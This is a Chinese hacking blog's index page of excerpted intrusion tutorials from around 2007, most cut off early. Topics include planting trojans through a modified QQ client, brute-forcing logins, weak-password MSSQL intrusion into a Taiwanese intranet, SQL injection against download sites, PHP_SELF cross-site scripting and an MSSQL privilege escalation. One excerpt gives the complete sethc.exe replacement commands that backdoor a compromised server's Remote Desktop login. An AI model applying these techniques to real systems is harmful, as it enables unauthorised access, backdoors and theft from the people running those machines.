分类 ‘技术文章’ 下的日志

狂人DIY版2007b3爆洞 – 利用音乐场景随意种马

鬼仔注:作者发的时候没有发图。

作者:JiaJia [YuLv]
来源:JiaJia's Home

声明:本文已发表到2007.09期的《黑客手册》杂志上,转载请注明。

说明:该漏洞是由QQ2007b3狂人DIY版中的vbscript.dll文件所引起的,在原版的QQ2007b3下不存在这个问题。(在光盘中提供了补丁文件,如果您现在使用的是狂人DIY版覆盖原来的文件即可解决此问题。)

起因与发现:

在七月的某天深夜,我挂着QQ在写AntiARP-DNS(广告:它一个不错的防ARP攻击的绿色免费工具)的时候,突然莫名其妙的弹出一个对话框,内容大概是“深夜我入侵了你…… By XXX”,如图1。当时把我一愣,刹那间脸都黑了一半,脑子中浮现出一句话“啊!难道真的被人家当肉鸡给玩弄 阅读全文 »

Tags:

网站登陆接口的攻与防

来源:http://hi.baidu.com/breachme
作者:breach
发表于《黑客防线》2006年第十期

随着技术的成熟,现在的网站安全也随着提高了很多,但还是有不少有待提高的地方。对于网站,我一直以来都想写一个好的登陆接口,因为现在大部分的网站的登陆接口我真的不大满意,多多少少都存在一些漏洞――比如cookie欺骗、SQL注入、暴力破解等,尤其是暴力破解的防范方面,有些做得不够彻底。最近我终于有 了时间,所以就有了下文――本文只讨论暴力破解及单用户同时刻登陆次数这两个攻防问题。

攻:
暴力破解使用的是穷举大法。别看不起这个世界上最笨的方法,这个方法在没有办法的时候就是最好的办法!现在我就先写一个暴力破解程序(就用千寂孤城所介绍的XMLHTTP控件――简单嘛^.^),不过需 阅读全文 »

在台湾某内网穿行

作者:丢丢&&樱花浪子
来源:http://www.hacklu.net
申明:本文已发表黑客手册,转载请注名版权,此文版权归樱花浪子和黑客手册所有. !
转载请注明!

一、丢丢

  近月来微软的dns远程溢出漏洞是很火,运用起来作用非常强大,我们小菜可喜欢了,可惜破坏力越大,网管门越是当心,越是关注,补洞越快,可怜小菜我奋斗几天,只有搞到一只,唉,还是走老路吧,记得某位前辈说过,弱口令是永远补不了的漏洞。

  好,那就让我们一起开始1433弱口令利用的旅程吧。我用的工具是极速MSSQL弱口令扫描改进版,在扫出1433弱口令的同时还可以看出这个服务器的3389端口是否开了。使用和扫描过程就不说了,我怕挨板子,相信这些难不倒你们的。

经过我这任劳任怨,永不停机甚至可以称为用 阅读全文 »

Tags:

无需输入密码登陆3389

鬼仔注:附带TT写的一个bat,方便些。

来源:脚本安全小组

在肉鸡上执行命令

copy c:\windows\explorer.exe c:\windows\system32\sethc.exe

copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

以后再连接肉鸡3389,敲5下shift键就可以直接进入了,无需输入密码,只是登陆上去没有任务栏,一直会有密码登陆框,不过够我们做很多事情了,目前win2003测试通过。

似乎2000也可以,XP不行。这两个系统没测试。

不知道有牛人知道是什么道理不.

小道消息:连敲5次shift就自动激活连滞键设置~~也就是自动执行sethc.exe 阅读全文 »

Tags:

浪人下载和浪人文章的漏洞利用

鬼仔注:未测试。不知道是不是新东西,对这两个系统没什么印象。看文章内容好像是从某个动画的说明文件的内容。不知道原作者是谁。

来源:失眠ヤ夜 's blog

一个注入漏洞

大家可以快进看
先随便点一个软件下载
官方都更新到2.4了,但是还是官方自己再用,不过也有漏洞哦
把下载地址复制到明小子里面,把I改成%69
看到了吗,没有改之前是不能注入额
恭喜,该URL可以注入!
数据库类型:Access数据库

下面来讲讲关键字的搜索
下载链接若长时间无响应,请稍候再试;无法下载或是其它问题,请给我留言…..就是这一句了
在BAIDU上搜搜看

我在本机上测试的
Admin_Info
是管理员表
密码是MD5加密的,在WWW.CMD5.COM上可以解密
郁闷。。。。不知道为什么本机老跑不出来
阅读全文 »

Tags:

针对$_SERVER[’PHP_SELF’]的跨站脚本攻击

文章来源:http://www.zhuaxia.com/item/233389902

现在的web服务器和开发工具虽然不会再出现像asp的%81那样明显的漏洞了,但是由于开发人员的疏忽和各种语言特性组合造成的一些奇异的漏洞仍然会存在。今天偶然读到的XSS Woes,就详细讲述了和$_SERVER[’PHP_SELF’]相关的一个危险漏洞。

$_SERVER[’PHP_SELF’]在开发的时候常会用到,一般用来引用当前网页地址,并且它是系统自动生成的全局变量,也会有什么问题么?让我们先看看下面的代码吧:

<form action=”<?php echo $_SERVER[’PHP_SELF’]; ?>”>
<input type=”submit” name=”submit” value=”submit” />
阅读全文 »

Tags:

MSSQL差异备份取系统权限(带演示动画)

鬼仔注:网吧更新,家里网络还没好,没几天就开学了,开学后恢复正常。

作者:kj021320
来源:邪恶八进制信息安全团队(www.eviloctal.com)
注意:本文章首发I.S.T.O技术团队后由原创作者kj021320友情提交到邪恶八进制信息安全团队论坛。

MSSQL差异备份取系统权限
TEAM里的内部资料放久了,现在不放出来,迟早会有人发掘出来的!既然如此就拿出来大家分享吧!
MSSQL差异备份获取webshell 几乎人人皆知,那么我们可以利用差异备份出来的文件 当作恶意代码
让系统执行了之后自动提升权限 或者添加管理员吗? 答案当然可以了,kj021320测试了N次之后跟你说!

那么我们得考虑文件摆放的位置~什么地方系统会运行呢?这个其实算是废话吧!
阅读全文 »

Tags: ,

QQ也来玩0day漏洞(杂志版带执行)

此文以发布在200709期X档案
转载请著明出自http://www.52cmd.cn

QQ也来玩0day漏洞
雕牌/杜华军(52cmd.cn)

再次申明:当您看到本文的时候,TX已经封了此漏洞,但是大家不要灰心,因为还可以突破,此文只是把具体执行写清楚了。图略

一,起因
起初研究这个漏洞并不是我发起的,上次写的那个baidu挂马的文章相信大家已经看了,那天教主忽然找我,说那QQ场景是比较脆弱的地方,也许能加载swf文件。后来失败告终。教主差不多放弃了,我闲着也是闲着。继续研究场景……

二,测试+利用
阅读全文 »

Tags: